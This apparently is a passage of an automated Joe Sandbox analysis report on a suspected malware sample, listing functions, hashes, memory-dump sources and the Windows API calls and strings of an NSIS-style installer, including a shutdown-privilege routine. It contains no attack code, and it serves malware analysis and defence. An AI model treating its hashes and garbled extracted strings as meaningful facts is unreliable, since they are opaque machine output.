Instruction ID: 13552c893ed7b86d42ae94349b46882dbbaaef49c4077465fe731b082f3d6c19
Opcode Fuzzy Hash: 9f13865558d7828ee8519fd134cab2730de4c5359a133bcb0a58c3e35d3926ba
Instruction Fuzzy Hash: BB01F6B5D1520ACFCF41DFA8D9405EEBBB1FB0A305F10115AD819BB310E7355A99CBA0

Function 373A9608 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40aa08bb112c50c96468b40a384a40061aac6dc904b6cd5aa4bb2bc784cda76d
Instruction ID: f20df469d6c04a5c56642d5d19c5fcc71d501cec636d5fa9fffab6c5ac2a1f1a
Opcode Fuzzy Hash: 40aa08bb112c50c96468b40a384a40061aac6dc904b6cd5aa4bb2bc784cda76d
Instruction Fuzzy Hash: 3CF0E5E1390314A7D7046ABD5416B7F2AAEEBC6792F004836E50EEB389DE909C4147F2

Function 0015B158 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2989268466.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fcd554335d49a96b72324b09b7ebdf391d566cc740c80f4f7c3863ff95fa9cc
Instruction ID: 81a2dd7bb0a3ded38eca9a7eaf506efb984988b3d5cdf0fa37afe262dc2073f1
Opcode Fuzzy Hash: 6fcd554335d49a96b72324b09b7ebdf391d566cc740c80f4f7c3863ff95fa9cc
Instruction Fuzzy Hash: FAF0983441AF429FE3112B30ACBC67A7FB5FF4B317B852C95E08A86432DB684454CB51

Function 00151877 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2989268466.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dddb24963ddf26ca39148e2c3d3a2d3801b354c1c5521d13bc67366f0029f3c2
Instruction ID: 7d21614bd979ef8b7f0dbfcc5f66d8fb77223a3df8f142e42499d3a0bac23fdb
Opcode Fuzzy Hash: dddb24963ddf26ca39148e2c3d3a2d3801b354c1c5521d13bc67366f0029f3c2
Instruction Fuzzy Hash: 00E09A31E113668ECB129FB0D8044EEBB30FEC3211B4642A7D010AB064EB301A4ECB62

Function 0015FE1C Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2989268466.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9b1f837b6f38a0fe79a1938706f71783e81b920b2b8b38938bfe8e35999283d
Instruction ID: a61ab35e9dc54f06b858de88f48faed14229cb4011103fcbd47e2194158b653f
Opcode Fuzzy Hash: b9b1f837b6f38a0fe79a1938706f71783e81b920b2b8b38938bfe8e35999283d
Instruction Fuzzy Hash: 97E06D74D05208EFC704DFB8D54969CBBF6EB48312F6080AAA818A3250E7315E4ADB40

Function 0015FE20 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2989268466.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa1a7f571b318eee87139c2585fadd3a660a0f99d3a3052f466d2cfb3e40d3f5
Instruction ID: 2cd5ea89053a3f1d4345d2f1b2b59c979e9f902038d58445ad977ae11bf7dd63
Opcode Fuzzy Hash: fa1a7f571b318eee87139c2585fadd3a660a0f99d3a3052f466d2cfb3e40d3f5
Instruction Fuzzy Hash: BBE01274D05208DFC704DFB9D54969DBBF5EB49301F6191BAD814A7350E7305E45DB40

Function 0015FC3E Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2989268466.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e39daa891290be1af9b84ca7574aa7e706aa08167d43b789eef3fcb7cbf308af
Instruction ID: 5eec11ce7c7ddffc14589ca0a2115fd2bbaaca426abc2343b0e32b1c46f25103
Opcode Fuzzy Hash: e39daa891290be1af9b84ca7574aa7e706aa08167d43b789eef3fcb7cbf308af
Instruction Fuzzy Hash: 5CE01A75901248DFCB04CFA4D5449ECB772FB49302B20246AEA057B250DB365D56DB14

Function 0015FF21 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2989268466.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbe9c4032e1dbf2eae4684f39922712b51ca51f27f87eb22a874389c21091ffc
Instruction ID: 5577d89e85dfe89953b0305840f589679fe5be5252e16b7e4e8adc67f98749e7
Opcode Fuzzy Hash: fbe9c4032e1dbf2eae4684f39922712b51ca51f27f87eb22a874389c21091ffc
Instruction Fuzzy Hash: 22E02B70C0E348AFC301AFA0C805AE97B789703311F5400DAAC08931A2D7700D1CC792

Function 00151888 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2989268466.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b79e7eb73c993437979bdd70d96769092859494b3f08a9f40622670cf1c08946
Instruction ID: 65796c6b09c89dcb44715985316754312f8fafbe344ea9273c532254887c604a
Opcode Fuzzy Hash: b79e7eb73c993437979bdd70d96769092859494b3f08a9f40622670cf1c08946
Instruction Fuzzy Hash: 17D05B31D2022B57CB10E7A5DC044EFF738FED6262B544626D51437154FB702659C6E1

Function 373ACF30 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f6443985460fe4a29aa730be93514a451ca75a070560dda0319fd6952886fce
Instruction ID: 862aacfb2ecca1de25342e9ffdc611a3243ce6831473a282e030ff37e500af03
Opcode Fuzzy Hash: 4f6443985460fe4a29aa730be93514a451ca75a070560dda0319fd6952886fce
Instruction Fuzzy Hash: F2D0A93210C3C04FCB138730A8158C47F706F03214B45A3EAD086CFEB3D192A805CB02

Function 373AD095 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6980726b71c20754c89432b9dbb5d99727ca68dcf7eae632ea3b1a6ec299a147
Instruction ID: 617bac7cdf93ac1d9798c3dd6a2b6f14ee7b4fa04b93250dd754e6540ef4920f
Opcode Fuzzy Hash: 6980726b71c20754c89432b9dbb5d99727ca68dcf7eae632ea3b1a6ec299a147
Instruction Fuzzy Hash: ADD0A73115F7A01FD713822C7C65D9A7FB54EC6611B0A46EBF05CCF1A296880B4A8396

Function 001556FF Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2989268466.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0b13ce713547d288106c193254d0431547d6b4a3edaf7bd3e04f8b2109440d5
Instruction ID: ef330ebee15dcd226f693854c31e75a891c7127279776173afd405077be34219
Opcode Fuzzy Hash: a0b13ce713547d288106c193254d0431547d6b4a3edaf7bd3e04f8b2109440d5
Instruction Fuzzy Hash: 46E0CD3100C3644FC503F734AC550453BB75BA0201B445516B0090B96EDE7415824765

Function 00159F6D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2989268466.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34fa96bb4671b1b9b6ddb91800b30bf88d79b5141894ad2208c70446c9966c8b
Instruction ID: db0e4215f6d4f9e00ef4557f4c08f14b55adbafaf7892dcd4ee9bfc5d2674a8b
Opcode Fuzzy Hash: 34fa96bb4671b1b9b6ddb91800b30bf88d79b5141894ad2208c70446c9966c8b
Instruction Fuzzy Hash: 07D0673AB400189FCB149F98EC809DDF776FF98221B548116E915A3261C7319965DB60

Function 0015FF30 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2989268466.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4732967f5d5d3355d903bea2c2932c06b923c775980d44f369174153438f4a37
Instruction ID: ed7fd0b549ae0bb15c001dab517d87edce76532de2393113517bf59d020ecee3
Opcode Fuzzy Hash: 4732967f5d5d3355d903bea2c2932c06b923c775980d44f369174153438f4a37
Instruction Fuzzy Hash: C1D0127080620CEFC744DFA4D809BEAB77DE747312F5051ADA91863250DBB15D14D795

Function 373A95D8 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f59c98cd8cc429bc5f24dece447ea3b906cb058f486ca5ee4c65d6a4655915b4
Instruction ID: 819949015b34ad061c3d88b839c6558b0c458a4c82590414298e70d0e3949bb9
Opcode Fuzzy Hash: f59c98cd8cc429bc5f24dece447ea3b906cb058f486ca5ee4c65d6a4655915b4
Instruction Fuzzy Hash: 78C0C0B2210720034214F61CB4805EF0AC4CFD8323310CD37F00CD30180D008C4B42C5

Function 373ABD48 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b01fbf8a285b0029eafcf0d235ba2b478137775773aaa0061b350908c6e13f
Instruction ID: 2e52d5de79bf56db28cf9c289925178be0d34a95d32cf7abe8454fd2569b7f22
Opcode Fuzzy Hash: 16b01fbf8a285b0029eafcf0d235ba2b478137775773aaa0061b350908c6e13f
Instruction Fuzzy Hash: B0C08C74051E098BE2042F50BC1CB79B7B8F707323FC82E10E00C028308BB85414CA44

Function 00155710 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2989268466.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be17d4baea3cedea44403bd6ee37bf3419cc3d7d5931186671b6c332a55dd03f
Instruction ID: 391006c22a2332aed2a6eb8b50675430a97335b46f253310599c1ebf9b81ea21
Opcode Fuzzy Hash: be17d4baea3cedea44403bd6ee37bf3419cc3d7d5931186671b6c332a55dd03f
Instruction Fuzzy Hash: 19C012300153284EC501F769FC46555776EA7A0302780A911B00D0756EDFB469C64BD4

Function 0015FFBC Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2989268466.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 516735763f67dc097f032f26ae0c418817fdacb7cf4303063b8153929b1bf632
Instruction ID: fbfe147c95e04dd17074144238427a9e57401514896d054cd0f18783dd52b42e
Opcode Fuzzy Hash: 516735763f67dc097f032f26ae0c418817fdacb7cf4303063b8153929b1bf632
Instruction Fuzzy Hash: 6DC0123E204601EB8A15DB54E44088EFBA3ABD4256B00882EB08C41A60C331D8659B42

Function 373A94B4 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5eaf839644d46101b831b6fd9c6e49c04eea207608da68d285bf6cbe0064dd25
Instruction ID: 146287cfcb4d1fe83a0db09705bfcc8782728782b27b55284b76a9179ac608ff
Opcode Fuzzy Hash: 5eaf839644d46101b831b6fd9c6e49c04eea207608da68d285bf6cbe0064dd25
Instruction Fuzzy Hash: D9C08C3026C3048FE240AA1DC984B6137ECEF85B04F0058E1F00C8B625CA22FC004704

Non-executed Functions

Function 004032A0 Relevance: 77.4, APIs: 32, Strings: 12, Instructions: 401stringfilecomCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32 ref: 004032C2
GetVersion.KERNEL32 ref: 004032C8
#17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00403318
OleInitialize.OLE32(00000000), ref: 0040331F
SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 0040333B
GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 00403350
GetModuleHandleW.KERNEL32(00000000,0043F000,00000000), ref: 00403363
CharNextW.USER32(00000000,0043F000,00000020), ref: 0040338A

Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458

GetTempPathW.KERNEL32(00000400,00441800), ref: 004034C5
GetWindowsDirectoryW.KERNEL32(00441800,000003FB), ref: 004034D6
lstrcatW.KERNEL32(00441800,\Temp), ref: 004034E2
GetTempPathW.KERNEL32(000003FC,00441800,00441800,\Temp), ref: 004034F6
lstrcatW.KERNEL32(00441800,Low), ref: 004034FE
SetEnvironmentVariableW.KERNEL32(TEMP,00441800,00441800,Low), ref: 0040350F
SetEnvironmentVariableW.KERNEL32(TMP,00441800), ref: 00403517
DeleteFileW.KERNEL32(00441000), ref: 0040352B

Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062

OleUninitialize.OLE32(?), ref: 004035F6
ExitProcess.KERNEL32 ref: 00403618
lstrcatW.KERNEL32(00441800,~nsu,0043F000,00000000,?), ref: 0040362B
lstrcatW.KERNEL32(00441800,0040A26C,00441800,~nsu,0043F000,00000000,?), ref: 0040363A
lstrcatW.KERNEL32(00441800,.tmp,00441800,~nsu,0043F000,00000000,?), ref: 00403645
lstrcmpiW.KERNEL32(00441800,00440800,00441800,.tmp,00441800,~nsu,0043F000,00000000,?), ref: 00403651
SetCurrentDirectoryW.KERNEL32(00441800,00441800), ref: 0040366D
DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00435000,?), ref: 004036C7
CopyFileW.KERNEL32(00442800,0042AA28,00000001), ref: 004036DB
CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403708
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403737
OpenProcessToken.ADVAPI32(00000000), ref: 0040373E
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403753
AdjustTokenPrivileges.ADVAPI32 ref: 00403776
ExitWindowsEx.USER32(00000002,80040002), ref: 0040379B
ExitProcess.KERNEL32 ref: 004037BE

Strings

.tmp, xrefs: 0040363F
USERENV, xrefs: 004032F1
NSIS Error, xrefs: 00403341
SETUPAPI, xrefs: 004032FB
~nsu, xrefs: 00403623
Low, xrefs: 004034F8
TMP, xrefs: 00403512
\Temp, xrefs: 004034DC
SeShutdownPrivilege, xrefs: 0040374D
Error launching installer, xrefs: 004035AD
TEMP, xrefs: 0040350A
UXTHEME, xrefs: 004032E7

Memory Dump Source

Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd

Similarity

API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
String ID: .tmp$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
API String ID: 3586999533-3972089011
Opcode ID: b76b61fe59c96232ee09de7477e4ba1d3ea630d83fddd21a04d7d9ff3721efeb
Instruction ID: 84ba5929d45b1413e1818888a5ef7abe037fd34abcf77f3f73da9f6cce4da4cf
Opcode Fuzzy Hash: b76b61fe59c96232ee09de7477e4ba1d3ea630d83fddd21a04d7d9ff3721efeb
Instruction Fuzzy Hash: 35D1F870500300ABD310BF659D49A3B3AADEB8174AF51443FF581B62E2DB7D8945876E

Function 00404B30 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404B48
GetDlgItem.USER32(?,00000408), ref: 00404B53
GlobalAlloc.KERNEL32(00000040,?), ref: 00404B9D
LoadBitmapW.USER32(0000006E), ref: 00404BB0
SetWindowLongW.USER32(?,000000FC,00405128), ref: 00404BC9
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BDD
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEF
SendMessageW.USER32(?,00001109,00000002), ref: 00404C05
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C11
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C23
DeleteObject.GDI32(00000000), ref: 00404C26
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C51
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C5D
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF3
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D1E
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D32
GetWindowLongW.USER32(?,000000F0), ref: 00404D61
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D6F
ShowWindow.USER32(?,00000005), ref: 00404D80
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E7D
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EE2
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EF7
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F1B
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F3B
ImageList_Destroy.COMCTL32(?), ref: 00404F50
GlobalFree.KERNEL32(?), ref: 00404F60
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD9
SendMessageW.USER32(?,00001102,?,?), ref: 00405082
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405091
InvalidateRect.USER32(?,00000000,00000001), ref: 004050B1
ShowWindow.USER32(?,00000000), ref: 004050FF
GetDlgItem.USER32(?,000003FE), ref: 0040510A
ShowWindow.USER32(00000000), ref: 00405111

Strings

, xrefs: 004050E9
N, xrefs: 00404DBB
M, xrefs: 00404CDA

Memory Dump Source

Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 4cbb5e0717cdc748ffed23d4a8be9d35437acf42fd757cc9a3c8c6ab170577e7
Instruction ID: 943130f726a074c81f80d4b2a4465e83a32f395645510c1f9de1d6fa8cfacfb7
Opcode Fuzzy Hash: 4cbb5e0717cdc748ffed23d4a8be9d35437acf42fd757cc9a3c8c6ab170577e7
Instruction Fuzzy Hash: 0A028FB0900209EFDB209F64DD85AAE7BB5FB84314F14857AF610BA2E1C7789D42DF58

Function 373AAFF8 Relevance: 23.0, Strings: 18, Instructions: 461COMMON

Download Yara Rule

Strings

PHdq, xrefs: 373AB62D
LjGp, xrefs: 373AB2AB
LjGp, xrefs: 373AB3A3
PHdq, xrefs: 373AB619
PHdq, xrefs: 373AB331
LjGp, xrefs: 373AB4AE
0oGp, xrefs: 373AB147
LjGp, xrefs: 373AB3B9
LjGp, xrefs: 373AB2C1
PHdq, xrefs: 373AB43D
PHdq, xrefs: 373AB51E
PHdq, xrefs: 373AB532
PHdq, xrefs: 373AB345
LjGp, xrefs: 373AB590
PHdq, xrefs: 373AB429
LjGp, xrefs: 373AB5A6
", xrefs: 373AB7CE
LjGp, xrefs: 373AB498

Memory Dump Source

Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd

Similarity

API ID:
String ID: "$0oGp$LjGp$LjGp$LjGp$LjGp$LjGp$LjGp$LjGp$LjGp$PHdq$PHdq$PHdq$PHdq$PHdq$PHdq$PHdq$PHdq
API String ID: 0-1726458773
Opcode ID: 4c92f61d007a41812e416334b8b432e4ba5b70d121570dd8580b1eb5ccd9937a
Instruction ID: d816e803308e02d656b268a817fca57e40f0958c1aa009a41ab9467555aef9ea
Opcode Fuzzy Hash: 4c92f61d007a41812e416334b8b432e4ba5b70d121570dd8580b1eb5ccd9937a
Instruction Fuzzy Hash: 43327FB4E102288FDB54CF69C944BDDBBB2BF89301F1081A9D909A7361DB759E85CF50

Function 00405846 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 148filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,74DF3420,00441800,0043F000), ref: 0040586F
lstrcatW.KERNEL32(0042F270,\*.*,0042F270,?,?,74DF3420,00441800,0043F000), ref: 004058B7
lstrcatW.KERNEL32(?,0040A014,?,0042F270,?,?,74DF3420,00441800,0043F000), ref: 004058DA
lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,74DF3420,00441800,0043F000), ref: 004058E0
FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,74DF3420,00441800,0043F000), ref: 004058F0
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,0040A300,0000002E), ref: 00405990
FindClose.KERNEL32(00000000), ref: 0040599F

Strings

\*.*, xrefs: 004058B1

Memory Dump Source

Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 2035342205-1173974218
Opcode ID: 758a93316bd333329ed0a6d4f3bd80d9b1b6158e35c963d2e10a1872ebc8ab6d
Instruction ID: 3422579b2d55acfa562187ab3f611d485c5dde76635b84dd87a68d04928cc13f
Opcode Fuzzy Hash: 758a93316bd333329ed0a6d4f3bd80d9b1b6158e35c963d2e10a1872ebc8ab6d
Instruction Fuzzy Hash: 4541F270900A04EADF21AB618C89BBF7678EF41724F14823BF801B51D1D77C49859E6E

Function 373AAFF7 Relevance: 12.9, Strings: 10, Instructions: 361COMMON

Download Yara Rule

Strings

PHdq, xrefs: 373AB62D
PHdq, xrefs: 373AB51E
PHdq, xrefs: 373AB532
PHdq, xrefs: 373AB345
PHdq, xrefs: 373AB619
PHdq, xrefs: 373AB331
PHdq, xrefs: 373AB429
", xrefs: 373AB7CE
0oGp, xrefs: 373AB147
PHdq, xrefs: 373AB43D

Memory Dump Source

Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd

Similarity

API ID:
String ID: "$0oGp$PHdq$PHdq$PHdq$PHdq$PHdq$PHdq$PHdq$PHdq
API String ID: 0-642543003
Opcode ID: 2cd742114876a18992dc6efb7eaf2ff71c227e6f29406380c4a0036ea1be8c59
Instruction ID: aba6641a86caa47710fe95b2dc79eff2d92431783e023e927ec27f57ab3b6c01
Opcode Fuzzy Hash: 2cd742114876a18992dc6efb7eaf2ff71c227e6f29406380c4a0036ea1be8c59
Instruction Fuzzy Hash: 47029FB4E002188FDB54CF69C994BDDBBF2BB89301F2081A9D909A7361DB759E85CF50

Function 373A7B65 Relevance: 4.3, Strings: 3, Instructions: 595COMMON

Download Yara Rule

Strings

4mV4DmV4hmV4, xrefs: 373A8428
.5|q, xrefs: 373A7C7B
B07, xrefs: 373A83D4

Memory Dump Source

Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd

Similarity

API ID:
String ID: .5|q$4mV4DmV4hmV4$B07
API String ID: 0-4096949436
Opcode ID: b6050315162c2d40925b1dd3f2b21ee054c39670ce630c11e6e3c741e0e6a8db
Instruction ID: d1778d0bef906d0efd5042b38da7dbec1e89e97b79015a1ed4cc06fc13f5942a
Opcode Fuzzy Hash: b6050315162c2d40925b1dd3f2b21ee054c39670ce630c11e6e3c741e0e6a8db
Instruction Fuzzy Hash: 64528E74E01268CFDB65DF69C884BDDBBB2BB89301F1081EAD409A7255DB35AE81CF50

Function 36ECBD88 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014695900.0000000036EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_36ec0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e08889d2c8e7a6b6e216da2ba1cd8584dc5a9a00ee1b2e59aff0e3aed28fc47
Instruction ID: 328241f8379d2c5a520ae674db5ddbefeb1ba13330959dcf8cc71cc761e3f0d9
Opcode Fuzzy Hash: 7e08889d2c8e7a6b6e216da2ba1cd8584dc5a9a00ee1b2e59aff0e3aed28fc47
Instruction Fuzzy Hash: 55C1C174E00258CFDB14DFA9C994B9DBBB2BF89301F2081AAD809AB355DB345E85CF51

Function 373A5F10 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

